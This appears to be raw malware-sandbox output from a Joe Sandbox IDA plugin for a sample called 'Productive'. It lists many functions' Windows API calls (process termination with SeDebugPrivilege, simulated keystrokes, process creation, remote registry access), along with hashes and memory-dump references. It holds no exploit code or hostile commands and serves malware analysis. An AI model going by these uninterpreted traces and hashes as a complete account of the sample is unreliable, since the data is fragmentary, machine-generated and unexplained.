                                                                                                                                                                • Opcode ID: 235f0c35fb25afa59f0d10c22cd2fff402a628724661ccfccacb179468dd47b8
                                                                                                                                                                • Instruction ID: 775f1620b5aa9197272719f7934889a5cc1f0443f090ecbb1941f66d16f94ceb
                                                                                                                                                                • Opcode Fuzzy Hash: 235f0c35fb25afa59f0d10c22cd2fff402a628724661ccfccacb179468dd47b8
                                                                                                                                                                • Instruction Fuzzy Hash: 77115CBA28A703B9F6036620EC17EE6739CDB02320F204017FB05B40D2FE65AD200D56
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00340980), ref: 00329412
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00340980), ref: 00329446
                                                                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003295C0
                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 003295EA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 560350794-0
                                                                                                                                                                • Opcode ID: da94c9ff5293221e83e2b408cfa6f0daeb2dcfbabb9e696933d02a1e92e432b6
                                                                                                                                                                • Instruction ID: 1746114f881c32466aea2954658a1bd3da4338d7e27136ee9789bc4e252508d6
                                                                                                                                                                • Opcode Fuzzy Hash: da94c9ff5293221e83e2b408cfa6f0daeb2dcfbabb9e696933d02a1e92e432b6
                                                                                                                                                                • Instruction Fuzzy Hash: BDF14A75A00219EFCF16DFA4D884EAEB7B9FF49314F118059F906AB251CB31AE45CB90
                                                                                                                                                                APIs
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00338D24
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InvalidateRect
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 634782764-0
                                                                                                                                                                • Opcode ID: 7695aabb05b65ec57edf61fe4ba125ed7bf7b9ace8d05f249ea5f96be6d7f669
                                                                                                                                                                • Instruction ID: 3f7d57267a8bb453d9c75f6107f2d38a92ca4864ad1659fae0751ce4bb12f8bd
                                                                                                                                                                • Opcode Fuzzy Hash: 7695aabb05b65ec57edf61fe4ba125ed7bf7b9ace8d05f249ea5f96be6d7f669
                                                                                                                                                                • Instruction Fuzzy Hash: 3751AC30641304BFEF269F28CCC9B99BBA8EB05350F244911FA15EA1E1CF71AD90CB50
                                                                                                                                                                APIs
                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002EC638
                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002EC65A
                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002EC672
                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002EC690
                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002EC6B1
                                                                                                                                                                • DestroyIcon.USER32(00000000), ref: 002EC6C0
                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002EC6DD
                                                                                                                                                                • DestroyIcon.USER32(?), ref: 002EC6EC
                                                                                                                                                                  • Part of subcall function 0033AAD4: DeleteObject.GDI32(00000000), ref: 0033AB0D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2819616528-0
                                                                                                                                                                • Opcode ID: 38e61f174505190dc2a5e0a8536eba80fec8dad7dd78e0bbaad6e7fb38d9649f
                                                                                                                                                                • Instruction ID: 6dd2d11f9361e32e7b42b6cf3bb91b45d71baea4de4f61307781fe8112767952
                                                                                                                                                                • Opcode Fuzzy Hash: 38e61f174505190dc2a5e0a8536eba80fec8dad7dd78e0bbaad6e7fb38d9649f
                                                                                                                                                                • Instruction Fuzzy Hash: 1A519B7062030AEFDB25DF65CC45BAA7BB9EB48350F200518F9469B690DB70ECA1DB50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0030B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0030B54D
                                                                                                                                                                  • Part of subcall function 0030B52D: GetCurrentThreadId.KERNEL32 ref: 0030B554
                                                                                                                                                                  • Part of subcall function 0030B52D: AttachThreadInput.USER32(00000000,?,0030A23B,?,00000001), ref: 0030B55B
                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0030A246
                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0030A263
                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0030A266
                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0030A26F
                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0030A28D
                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0030A290
                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0030A299
                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0030A2B0
                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0030A2B3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                                • Opcode ID: c01aeff98a7543c1d6e9db3a1fb3485cd196ed05a0fdf992d85b0dd8bd56ed94
                                                                                                                                                                • Instruction ID: d9c69043ff2f014458b41b1fae0d0bb379f1cb035f1d5ba46bc4e6b42a6af27b
                                                                                                                                                                • Opcode Fuzzy Hash: c01aeff98a7543c1d6e9db3a1fb3485cd196ed05a0fdf992d85b0dd8bd56ed94
                                                                                                                                                                • Instruction Fuzzy Hash: CB11E1B5A50618BEF6116F609C8AF6A7B2DEB4E751F110429F3406F0D0CEF36C509AA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0030915A,00000B00,?,?), ref: 003094E2
                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,0030915A,00000B00,?,?), ref: 003094E9
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0030915A,00000B00,?,?), ref: 003094FE
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,0030915A,00000B00,?,?), ref: 00309506
                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0030915A,00000B00,?,?), ref: 00309509
                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0030915A,00000B00,?,?), ref: 00309519
                                                                                                                                                                • GetCurrentProcess.KERNEL32(0030915A,00000000,?,0030915A,00000B00,?,?), ref: 00309521
                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,0030915A,00000B00,?,?), ref: 00309524
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0030954A,00000000,00000000,00000000), ref: 0030953E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1957940570-0
                                                                                                                                                                • Opcode ID: 020e4a95d2a8e004fa247327f70c78ee9a7352388ccb498793ce260e120ea661
                                                                                                                                                                • Instruction ID: e8bc155bb24ab7a0d9e1b64299efcd564b02390fa7831b6f9a9ee10c1dec7b69
                                                                                                                                                                • Opcode Fuzzy Hash: 020e4a95d2a8e004fa247327f70c78ee9a7352388ccb498793ce260e120ea661
                                                                                                                                                                • Instruction Fuzzy Hash: 4701A8B9340304BFE651ABA5DC4DF6B7BACEB8A711F004411FA05DB1A1CA70A8008A20
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,003753BA,00000104,00000004,00000001,002D1003), ref: 002DA48A
                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,00000004,00000001,002D1003), ref: 002DA544
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 002DA593
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$HandleModuleNameWrite
                                                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                • API String ID: 3784150691-4022980321
                                                                                                                                                                • Opcode ID: 918b34d2c0269e99cc33db30161f5b93ea179476ee408b5de5f3d38e4853d58b
                                                                                                                                                                • Instruction ID: 13a9fcc52b986e8bc7ca70d999d8a7ff08b89b2bdfabe203e82baf6cbd0332e0
                                                                                                                                                                • Opcode Fuzzy Hash: 918b34d2c0269e99cc33db30161f5b93ea179476ee408b5de5f3d38e4853d58b
                                                                                                                                                                • Instruction Fuzzy Hash: 42415B75E60B136AE7276A68AC06FEE335C6B15714F400036FD09A63D1EAE19E244593
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00314148: CreateToolhelp32Snapshot.KERNEL32 ref: 0031416D
                                                                                                                                                                  • Part of subcall function 00314148: Process32FirstW.KERNEL32(00000000,?), ref: 0031417B
                                                                                                                                                                  • Part of subcall function 00314148: CloseHandle.KERNEL32(00000000), ref: 00314245
                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032F08D
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0032F0A0
                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032F0CF
                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0032F14C
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 0032F157
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0032F18C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                                • API String ID: 2533919879-2896544425
                                                                                                                                                                • Opcode ID: 85bbefdb5c781bb684814f0b6af1b91dd1c7b351f07e5ee39f0b1da9ebe81374
                                                                                                                                                                • Instruction ID: 5640bf718583b7b293b3066d1e2d7076304ba59452cfc8a1534e5e2f766d8365
                                                                                                                                                                • Opcode Fuzzy Hash: 85bbefdb5c781bb684814f0b6af1b91dd1c7b351f07e5ee39f0b1da9ebe81374
                                                                                                                                                                • Instruction Fuzzy Hash: 5641BB342102019FD71AEF24DCA5FADB7A5AF84714F088428F9428F2D3CB74A924CF85
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0032FF31
                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0032FF55
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0032FF95
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0032FFB7
                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00330133
                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00330165
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00330194
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0033020B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2947177986-0
                                                                                                                                                                • Opcode ID: 546bc6ef9477cfa89f8b3f96727743fb5255549f3b24e149df0154841b447992
                                                                                                                                                                • Instruction ID: 6a0d36122be3f938448c162d84ba96d4fa65ec666ca59516fe0c149249d7db47
                                                                                                                                                                • Opcode Fuzzy Hash: 546bc6ef9477cfa89f8b3f96727743fb5255549f3b24e149df0154841b447992
                                                                                                                                                                • Instruction Fuzzy Hash: EDE1C0312043019FC71AEF24D891B6ABBE5AF85350F15896DF9899F2A2CB31EC45CF52
                                                                                                                                                                APIs
                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00318027
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ArraySafeVartype
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1725837607-0
                                                                                                                                                                • Opcode ID: 068c14ad75d59564d10cc1da96c059772c4c255b15ae81fb72e21c816f4d275f
                                                                                                                                                                • Instruction ID: 0c3923570e731309b4351813b5b2daad50f056bd66fc22f84ce1916a57e67680
                                                                                                                                                                • Opcode Fuzzy Hash: 068c14ad75d59564d10cc1da96c059772c4c255b15ae81fb72e21c816f4d275f
                                                                                                                                                                • Instruction Fuzzy Hash: 71B1C171E002199FDB06DF94C484BFEB7B9EF0D321F154429E601EB241DB34A982CB94
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0033DB42
                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 0033DB62
                                                                                                                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0033DD9D
                                                                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0033DDBB
                                                                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0033DDDC
                                                                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 0033DDFB
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0033DE20
                                                                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 0033DE43
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1211466189-0
                                                                                                                                                                • Opcode ID: 9640a465a466c52b978d642f6f64a2eaf1938924a9dde1c49c9621f52618edbc
                                                                                                                                                                • Instruction ID: f4417790412101e2a46a04e4b18c1941ba5ed835eed50cb51aeb6630f83c781c
                                                                                                                                                                • Opcode Fuzzy Hash: 9640a465a466c52b978d642f6f64a2eaf1938924a9dde1c49c9621f52618edbc
                                                                                                                                                                • Instruction Fuzzy Hash: 9CB19935A00215EFDF1ACF69D9C57AD7BB1FF04701F098069ED489E295DB34A990CBA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0033147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0033040D,?,?), ref: 00331491
                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0033044E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BuffCharConnectRegistryUpper
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2595220575-0
                                                                                                                                                                • Opcode ID: 08f486a4a3441a62740f68807d82ff20c22685152b56f9fa80b5d75791e92922
                                                                                                                                                                • Instruction ID: ba7c85dbeb16a2e3bb982cce81aec1c50fdd7654e3f1293490c526de8ac13dff
                                                                                                                                                                • Opcode Fuzzy Hash: 08f486a4a3441a62740f68807d82ff20c22685152b56f9fa80b5d75791e92922
                                                                                                                                                                • Instruction Fuzzy Hash: A0A19C302042019FCB1AEF64C891F6EB7E5EF85314F14891DF9968B2A2DB35E965CF42
                                                                                                                                                                APIs
                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002EC508,00000004,00000000,00000000,00000000), ref: 002B2E9F
                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,002EC508,00000004,00000000,00000000,00000000,000000FF), ref: 002B2EE7
                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,002EC508,00000004,00000000,00000000,00000000), ref: 002EC55B
                                                                                                                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,002EC508,00000004,00000000,00000000,00000000), ref: 002EC5C7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ShowWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                                                • Opcode ID: c23ff9422aea393f508513e021b56c2658c4304b558d30a7a560976be7b701a1
                                                                                                                                                                • Instruction ID: a96acd992a11f787e5e366259b09877bc81788ae4d9b2ebcd7b7155ec02cf90a
                                                                                                                                                                • Opcode Fuzzy Hash: c23ff9422aea393f508513e021b56c2658c4304b558d30a7a560976be7b701a1
                                                                                                                                                                • Instruction Fuzzy Hash: 63410A306347C1DAC73A8F2BC9CC7AA7BD5AB81340FA4440DE54756560CB74F8A9D711
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00336810
                                                                                                                                                                • GetDC.USER32(00000000), ref: 00336818
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00336823
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0033682F
                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0033686B
                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0033687C
                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0033964F,?,?,000000FF,00000000,?,000000FF,?), ref: 003368B6
                                                                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003368D6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
